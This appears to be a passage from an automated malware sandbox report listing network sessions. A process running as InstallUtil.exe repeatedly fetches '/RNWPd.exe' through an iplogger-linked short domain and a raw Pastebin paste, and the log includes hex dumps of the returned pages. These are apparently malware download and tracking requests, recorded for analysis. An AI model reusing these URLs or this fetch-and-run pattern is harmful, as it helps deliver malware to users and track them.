                            2024-09-10 16:21:23 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                            Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                            2024-09-10 16:21:23 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                            Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                            2024-09-10 16:21:23 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                            Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                            2024-09-10 16:21:23 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                            Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                            2024-09-10 16:21:23 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            10192.168.2.1149722188.114.97.34437848C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            TimestampBytes transferredDirectionData
                            2024-09-10 16:21:24 UTC65OUTGET /RNWPd.exe HTTP/1.1
                            Host: yip.su
                            Connection: Keep-Alive
                            2024-09-10 16:21:24 UTC902INHTTP/1.1 200 OK
                            Date: Tue, 10 Sep 2024 16:21:24 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            memory: 0.36197662353515625
                            expires: Tue, 10 Sep 2024 16:21:24 GMT
                            strict-transport-security: max-age=604800
                            strict-transport-security: max-age=31536000
                            content-security-policy: img-src https: data:; upgrade-insecure-requests
                            x-frame-options: SAMEORIGIN
                            Cache-Control: max-age=14400
                            CF-Cache-Status: HIT
                            Age: 0
                            Last-Modified: Tue, 10 Sep 2024 16:21:24 GMT
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oir1RguIYjfti%2B8C%2BJzLSWx8ailq2zslfdG1YLKCp%2FPzx8WYUFOZVKL48jyK36yGfTwzsTudoOqRrlq3v2XMv8qurqUPku1mfFUdG0PFNhK9KaHvD3sEOSQ%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8c10c03a2dff430f-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-09-10 16:21:24 UTC467INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                            Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                            2024-09-10 16:21:24 UTC1369INData Raw: 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65
                            Data Ascii: after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta prope
                            2024-09-10 16:21:24 UTC1369INData Raw: 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61
                            Data Ascii: d-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-dela
                            2024-09-10 16:21:24 UTC1369INData Raw: 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d
                            Data Ascii: serAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(nam
                            2024-09-10 16:21:24 UTC1369INData Raw: 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65
                            Data Ascii: <style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;borde
                            2024-09-10 16:21:24 UTC1369INData Raw: 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64
                            Data Ascii: px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id
                            2024-09-10 16:21:24 UTC158INData Raw: 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: tyle.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                            2024-09-10 16:21:24 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            11192.168.2.1149723104.20.3.2354437848C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            TimestampBytes transferredDirectionData
                            2024-09-10 16:21:29 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                            Host: pastebin.com
                            Connection: Keep-Alive
                            2024-09-10 16:21:29 UTC222INHTTP/1.1 200 OK
                            Date: Tue, 10 Sep 2024 16:21:29 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Frame-Options: SAMEORIGIN
                            Server: cloudflare
                            CF-RAY: 8c10c05a281a42c7-EWR
                            2024-09-10 16:21:29 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                            Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                            2024-09-10 16:21:29 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                            Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                            2024-09-10 16:21:29 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                            Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                            2024-09-10 16:21:29 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                            Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                            2024-09-10 16:21:29 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            12192.168.2.1149724188.114.97.34437848C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            TimestampBytes transferredDirectionData
                            2024-09-10 16:21:29 UTC65OUTGET /RNWPd.exe HTTP/1.1
                            Host: yip.su
                            Connection: Keep-Alive
                            2024-09-10 16:21:29 UTC906INHTTP/1.1 200 OK
                            Date: Tue, 10 Sep 2024 16:21:29 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            memory: 0.36197662353515625
                            expires: Tue, 10 Sep 2024 16:21:29 GMT
                            strict-transport-security: max-age=604800
                            strict-transport-security: max-age=31536000
                            content-security-policy: img-src https: data:; upgrade-insecure-requests
                            x-frame-options: SAMEORIGIN
                            Cache-Control: max-age=14400
                            CF-Cache-Status: HIT
                            Age: 0
                            Last-Modified: Tue, 10 Sep 2024 16:21:29 GMT
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7zRFOz%2FkgmDStPuSKoNZivF161KCsj7P%2B%2BqJ5fADIaSADXWWqHC6emHOfQP7K%2BrfXvYXSBWNOjo9Ieg8x2egHpg4DTjI5k4HX%2FutOtaQaFOAEfEv1Eb2wuE%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8c10c05e1e7c43a0-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-09-10 16:21:29 UTC463INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                            Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                            2024-09-10 16:21:29 UTC1369INData Raw: 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70
                            Data Ascii: sit-after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta p
                            2024-09-10 16:21:29 UTC1369INData Raw: 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d
